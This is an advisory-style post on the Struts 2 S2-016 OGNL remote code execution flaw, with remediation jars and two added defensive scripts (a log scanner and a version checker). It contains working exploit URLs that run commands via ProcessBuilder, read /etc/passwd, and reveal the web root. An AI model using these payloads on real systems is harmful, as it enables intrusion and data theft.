Struts 2 hit by another remote code execution vulnerability (S2-016)

Struts has yet another remote code execution vulnerability! In this one, an attacker can execute malicious code remotely by manipulating request parameters. In versions before Struts 2.3.15.1, the values following the action:, redirect: and redirectAction: parameter prefixes are not properly filtered, so they are evaluated as OGNL expressions and lead to code execution.

Description

Affected versions   Struts 2.0.0 - Struts 2.3.15
Reporter            Takeshi Terada of Mitsui Bussan Secure Directions, Inc.
CVE ID              CVE-2013-2251

Proof of concept

The parameter value is evaluated as an OGNL expression

http://host/struts2-blank/example/X.action?action:%25{3*4}

http://host/struts2-showcase/employee/save.action?redirect:%25{3*4}

Code execution

http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}

http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}


http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}


Root cause

The Struts 2 DefaultActionMapper supports a method for short-circuit navigation state changes by prefixing parameters with "action:" or "redirect:", followed by a desired navigational target expression. This mechanism was intended to help with attaching navigational information to buttons within forms.

In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or "redirectAction:" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.

Apache official advisory

Domestic websites are severely affected


The following is provided for educational and research purposes only; illegal use is strictly prohibited!

EXP for executing arbitrary commands, thanks to X for providing it:

?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}

EXP for revealing the web root path, thanks to h4ck0r for providing it:

?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D
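The proof-of-concept URLs and the two EXP payloads above share one shape: a query parameter whose name starts with one of the three DefaultActionMapper prefixes (action:, redirect:, redirectAction:) and is immediately followed by an OGNL marker (%{ or ${), often URL-encoded once or twice (%25{ and %24%7B in the samples). The following is an added example, not part of the original post, that turns that observation into a log scanner a defender can run over web server access logs to find S2-016 probing. The log lines, IP addresses and paths inside it are constructed for the example; the LOG_RE and PROBE_RE patterns and the function names are the example's own.

```python
"""Detect S2-016 style requests in web-server access logs (added example).

Flags a query parameter that starts with action:, redirect: or
redirectAction: and is followed by an OGNL expression marker (%{ or ${).
Legitimate use of the feature (e.g. redirect:/home.jsp) carries no marker
and is not flagged.
"""
import re
from urllib.parse import unquote

# Combined-log style line: client IP first, request line in double quotes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"'
)

# Prefix at the start of a query parameter, then an OGNL marker.
PROBE_RE = re.compile(
    r'(?:^|&)(?P<prefix>action|redirect|redirectAction):\s*[%$]\{',
    re.IGNORECASE,
)


def decode_target(target, rounds=2):
    """URL-decode the request target, up to `rounds` times.

    Two rounds cover the double-encoded %25{ seen in the proof of concept:
    %25{ -> %{ after one round; a clean string stops early.
    """
    for _ in range(rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target


def classify_request(target):
    """Return the abused prefix (lower-cased) or None for a clean request."""
    decoded = decode_target(target)
    if "?" not in decoded:
        return None
    query = decoded.split("?", 1)[1]
    match = PROBE_RE.search(query)
    return match.group("prefix").lower() if match else None


def scan_log(lines):
    """Return (client_ip, prefix, raw_target) for every suspicious line."""
    hits = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue  # not a request line we understand
        prefix = classify_request(match.group("target"))
        if prefix:
            hits.append((match.group("ip"), prefix, match.group("target")))
    return hits


# Constructed sample log: two probes, one benign redirect, one ordinary page.
SAMPLE_LOG = [
    '10.0.0.5 - - [17/Jul/2013:10:01:02 +0000] "GET /struts2-blank/example/X.action?action:%25{3*4} HTTP/1.1" 200 512',
    '10.0.0.6 - - [17/Jul/2013:10:01:03 +0000] "GET /app/save.action?redirect%3A%24%7B%23req%3D%23context.get%28%27x%27%29%7D HTTP/1.1" 302 0',
    '10.0.0.7 - - [17/Jul/2013:10:01:04 +0000] "GET /app/save.action?redirect:/home.jsp HTTP/1.1" 302 0',
    '10.0.0.8 - - [17/Jul/2013:10:01:05 +0000] "GET /app/list.action?page=2&sort=name HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for ip, prefix, target in scan_log(SAMPLE_LOG):
        print(f"{ip} probe via '{prefix}:' -> {target[:70]}")
```

The scanner decodes before matching because the prefix, the colon and the marker all appear encoded in the wild (redirect%3A%24%7B), and it matches only on the parameter-name position so a normal redirect to a JSP path is not reported. Feeding it a full access log and grouping hits by client IP gives a quick picture of who was probing and which prefix they used.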

Upgrading Struts 2 requires the following packages

commons-lang3-3.1.jar

javassist-3.18.1-GA.jar

ognl-3.0.6.jar

struts2-core-2.3.16.jar

struts2-spring-plugin-2.3.16.jar

xwork-core-2.3.16.jar
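To decide whether a deployment actually needs the upgrade above, the struts2-core jar in WEB-INF/lib is the thing to look at: the advisory puts the affected range at 2.0.0 through 2.3.15, with 2.3.15.1 the first fixed release. The following is an added example, not part of the original post, that reads the version out of struts2-core-<version>.jar filenames and reports whether the deployment falls in the affected range. The jar listing it runs on is constructed; the regex and function names are the example's own.

```python
"""Triage struts2-core jar versions against the S2-016 affected range (added example)."""
import re

AFFECTED_FROM = (2, 0, 0)     # first affected release, per the advisory
FIRST_FIXED = (2, 3, 15, 1)   # first release carrying the fix

# struts2-core-2.3.15.jar, struts2-core-2.3.15.1.jar, struts2-core-2.3.16-SNAPSHOT.jar
CORE_JAR_RE = re.compile(r"^struts2-core-(\d+(?:\.\d+)*)(?:[-.][A-Za-z0-9]+)?\.jar$")


def parse_version(text):
    """'2.3.15.1' -> (2, 3, 15, 1)."""
    return tuple(int(part) for part in text.split("."))


def pad(version, width=4):
    """Right-pad with zeros so (2, 3, 15) compares as (2, 3, 15, 0)."""
    return tuple(version) + (0,) * (width - len(version))


def is_affected(version_text):
    """True when 2.0.0 <= version < 2.3.15.1."""
    version = pad(parse_version(version_text))
    return pad(AFFECTED_FROM) <= version < pad(FIRST_FIXED)


def triage_lib_dir(jar_names):
    """Return (core_version, affected) from a WEB-INF/lib listing.

    Returns (None, None) when no struts2-core jar is present at all.
    """
    for name in jar_names:
        match = CORE_JAR_RE.match(name)
        if match:
            return match.group(1), is_affected(match.group(1))
    return None, None


# Constructed WEB-INF/lib listing of a not-yet-upgraded application.
SAMPLE_LIB = [
    "commons-lang3-3.1.jar",
    "ognl-3.0.6.jar",
    "struts2-core-2.3.15.jar",
    "xwork-core-2.3.15.jar",
]

if __name__ == "__main__":
    version, affected = triage_lib_dir(SAMPLE_LIB)
    if version is None:
        print("no struts2-core jar found")
    else:
        print(f"struts2-core {version}: {'AFFECTED, upgrade' if affected else 'not affected'}")
```

On a real host, pass it the result of listing WEB-INF/lib for each deployed application; a version of 2.3.15.1 or later comes back as not affected, anything from 2.0.0 up to and including 2.3.15 as affected.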
